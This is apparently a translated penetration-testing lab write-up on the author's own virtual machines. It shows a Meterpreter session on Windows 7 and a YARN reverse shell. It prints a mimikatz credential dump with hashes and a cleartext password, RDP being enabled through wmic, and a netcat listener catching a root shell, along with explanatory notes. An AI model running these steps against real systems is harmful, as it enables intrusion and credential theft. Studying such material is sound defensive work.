192.168.1.2[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:49249) at 2020-08-08 20:00:18 +0800[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The session runs as SYSTEM (see whoami below). chcp 65001 switches the cmd channel to UTF-8 because the target's system locale is zh-cn and its banner otherwise arrives mis-encoded.

meterpreter > shell
Process 2792 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>chcp 65001
Active code page: 65001

C:\Windows\system32>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . : localdomain
   IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b
   Temporary IPv6 Address. . . . . . : fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037
   Link-local IPv6 Address . . . . . : fe80::7002:eaf9:c043:7b1b%14
   IPv4 Address. . . . . . . . . . . : 10.211.55.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::21c:42ff:fe00:18%14
                                       10.211.55.1

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>exit
meterpreter > shell
Process 2852 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>chcp 65001
Active code page: 65001

C:\Windows\system32>systeminfo

Host Name:                 RETURN0FA54
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          return0;
Registered Organization:
Product ID:                00426-384-1216344-06000
Original Install Date:     2020/7/13, 1:45:07
System Boot Time:          2020/8/8, 14:45:29
System Manufacturer:       Parallels Software International Inc.
System Model:              Parallels Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2400 Mhz
BIOS Version:              Parallels Software International Inc. 15.1.4 (47270), 2020/4/13
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             zh-cn;Chinese (China)
Input Locale:              en-us;English (United States)
Time Zone:                 N/A
Total Physical Memory:     4,096 MB
Available Physical Memory: 3,313 MB
Virtual Memory: Max Size:  8,189 MB
Virtual Memory: Available: 7,308 MB
Virtual Memory: In Use:    881 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Parallels Ethernet Adapter
                                 Connection Name: Local Area Connection 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.211.55.1
                                 IP address(es)
                                 [01]: 10.211.55.8
                                 [02]: fe80::7002:eaf9:c043:7b1b
                                 [03]: fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037
                                 [04]: fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b

C:\Windows\system32>exit
meterpreter > upload /Users/return0/Desktop/tools/10內網滲透/mimikatz_trunk/x64/mimikatz.exe
[*] uploading  : /Users/return0/Desktop/tools/10內網滲透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe
[*] Uploaded 1.21 MiB of 1.21 MiB (100.0%): /Users/return0/Desktop/tools/10內網滲透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe
[*] uploaded   : /Users/return0/Desktop/tools/10內網滲透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe
meterpreter > shell
Process 1088 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>chcp 65001
Active code page: 65001

C:\Windows\system32>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # sekurlsa::logopasswords
ERROR mimikatz_doLocal ; "logopasswords" command of "sekurlsa" module not found !

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

            msv  -  Lists LM & NTLM credentials
        wdigest  -  Lists WDigest credentials
       kerberos  -  Lists Kerberos credentials
          tspkg  -  Lists TsPkg credentials
        livessp  -  Lists LiveSSP credentials
            ssp  -  Lists SSP credentials
 logonPasswords  -  Lists all available providers credentials
        process  -  Switch (or reinit) to LSASS process context
       minidump  -  Switch (or reinit) to LSASS minidump context
        bootkey  -  Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials
            pth  -  Pass-the-hash
         krbtgt  -  krbtgt!
    dpapisystem  -  DPAPI_SYSTEM secret
          trust  -  Antisocial
     backupkeys  -  Preferred Backup Master keys
        tickets  -  List Kerberos tickets
          ekeys  -  List Kerberos Encryption Keys
          dpapi  -  List Cached MasterKeys
        credman  -  List Credentials Manager
mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 73647 (00000000:00011faf)
Session           : Interactive from 1
User Name         : return0
Domain            : RETURN0FA54
Logon Server      : RETURN0FA54
Logon Time        : 2020/8/8 14:45:41
SID               : S-1-5-21-2676871807-2807053931-1165176819-1000
        msv :
         [00000003] Primary
         * Username   : return0
         * Domain     : RETURN0FA54
         * LM         : b47f9a39939fbe2e3cfeb463bfee415c
         * NTLM       : 52dec73c7fb089d8917fbdf7985b6036
         * SHA1       : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf
        tspkg :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        wdigest :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        kerberos :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        ssp :
        credman :

Authentication Id : 0 ; 73594 (00000000:00011f7a)
Session           : Interactive from 1
User Name         : return0
Domain            : RETURN0FA54
Logon Server      : RETURN0FA54
Logon Time        : 2020/8/8 14:45:41
SID               : S-1-5-21-2676871807-2807053931-1165176819-1000
        msv :
         [00000003] Primary
         * Username   : return0
         * Domain     : RETURN0FA54
         * LM         : b47f9a39939fbe2e3cfeb463bfee415c
         * NTLM       : 52dec73c7fb089d8917fbdf7985b6036
         * SHA1       : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf
        tspkg :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        wdigest :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        kerberos :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:40
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : RETURN0FA54$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:40
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username   : RETURN0FA54$
         * Domain     : WORKGROUP
         * Password   : (null)
        kerberos :
         * Username   : return0fa54$
         * Domain     : WORKGROUP
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 30280 (00000000:00007648)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:39
SID               :
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : RETURN0FA54$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:39
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username   : RETURN0FA54$
         * Domain     : WORKGROUP
         * Password   : (null)
        kerberos :
         * Username   : return0fa54$
         * Domain     : WORKGROUP
         * Password   : (null)
        ssp :
        credman :

Both interactive sessions for return0 give back the cleartext password from the tspkg, wdigest and kerberos providers, not just the NTLM hash from msv. That is the Windows 7 default: those SSPs keep a reversible copy of the logon password in LSASS. KB2871997 removes the copies held by TsPkg and Kerberos and adds the HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential value, which set to 0 does the same for WDigest; the two-entry hotfix list in systeminfo above shows none of that has happened on this host. The machine account RETURN0FA54$ (S-1-5-18 and S-1-5-20) and LOCAL SERVICE (S-1-5-19) hold nothing usable, as expected on a workgroup host.
mimikatz # exit
Bye!

C:\Windows\system32>wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
Executing (\\RETURN0FA54\ROOT\CIMV2\TerminalServices:Win32_TerminalServiceSetting.ServerName="RETURN0FA54")->SetAllowTSConnections()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
};

C:\Windows\system32>exit

With the hash and the cleartext password in hand, the last step turns Remote Desktop on. ReturnValue = 0 only confirms that fDenyTSConnections was cleared; it says nothing about whether the Windows Firewall allows TCP 3389, so check that before relying on RDP. Enabling RDP and leaving mimikatz.exe in C:\Windows\system32 are both persistent changes to the client's host: record them in the report and revert them when the engagement ends.

Exploitation - Hadoop unauthorized access getshell

Port 8088 on 10.211.55.6 is the default YARN ResourceManager web port (Nmap's "radan-http" label is only the IANA name for that port number). A ResourceManager with no authentication lets anyone submit an application, and the command of that application's first container runs on a NodeManager.

(base) ➜ ~ nc -l 8888
bash: cannot set terminal process group (211): Inappropriate ioctl for device
bash: no job control in this shell
<33412_0001/container_1596872533412_0001_01_000001# whoami
root
<33412_0001/container_1596872533412_0001_01_000001# ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:ac:1a:00:02
          inet addr:172.26.0.2  Bcast:172.26.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17365 errors:0 dropped:0 overruns:0 frame:0
          TX packets:34456 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1858357 (1.7 MiB)  TX bytes:5760591 (5.4 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:8 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:647 (647.0 B)  TX bytes:647 (647.0 B)

<33412_0001/container_1596872533412_0001_01_000001# id
uid=0(root) gid=0(root) groups=0(root)
<33412_0001/container_1596872533412_0001_01_000001# exit

The shell lands with its working directory inside a YARN container: container_1596872533412_0001_01_000001 is attempt 1, container 1 (the ApplicationMaster) of application 0001 on a ResourceManager whose cluster timestamp is 1596872533412, which is exactly what a submitted application produces. Two things to settle before reporting this as "root on the Hadoop host": the 02:42 MAC prefix and the 172.26.0.2/16 address are what Docker bridge networking hands out, so this is most likely root inside a container rather than on 10.211.55.6 itself (confirm via the hostname and /proc/1/cgroup before claiming host compromise), and the "no job control" messages only mean the reverse shell has no pty.

An aside

(Three screenshots in the original, captioned "originally it looked like this", "then it turned out like this" and "in the end it became this".)
Thank you for patiently reading this far. The full version is on Yuque; if you want to read it, you are welcome to join my Yuque team. I want to put a team together, since working alone is rather lonely, and I hope more people will come and build up the Yuque library with me, recording what they have learned, gained and understood. Message me through the WeChat public account and I will tell you how to join. (There is a threshold, but not a high one; its purpose is to see whether you are a good fit.)

This article is shared from the WeChat public account 攻防SRC (SNNUSRC).
